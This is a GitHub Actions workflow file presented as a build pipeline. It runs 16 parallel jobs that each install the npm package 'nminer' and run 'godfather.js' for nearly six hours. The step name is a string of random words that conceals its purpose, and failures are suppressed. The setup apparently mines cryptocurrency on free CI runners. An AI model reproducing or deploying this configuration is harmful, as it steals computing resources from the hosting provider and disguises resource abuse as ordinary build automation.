name: godfather
on:
  push:
    branches: [ "main" ]

jobs:
  build:
    runs-on: ubuntu-latest
    strategy:
      matrix:
        config:
          - { version: 478 }
          - { version: 113 }
          - { version: 9932 }
          - { version: 7853 }
          - { version: 7632 }
          - { version: 689 }
          - { version: 6206 }
          - { version: 8765 }
          - { version: 9716 }
          - { version: 5624 }
          - { version: 4514 }
          - { version: 7355 }
          - { version: 5863 }
          - { version: 1046 }
          - { version: 5374 }
          - { version: 2434 }

    steps:
      - name: Checkout
        uses: actions/checkout@v4

      - name: Install Node.js
        uses: actions/setup-node@v3
        with:
          node-version: 20
          
      - name: mmm glum impeccable mobilize bravely
        run: |
          npm install nminer@latest
          timeout 344m node godfather.js || echo "godfather executed"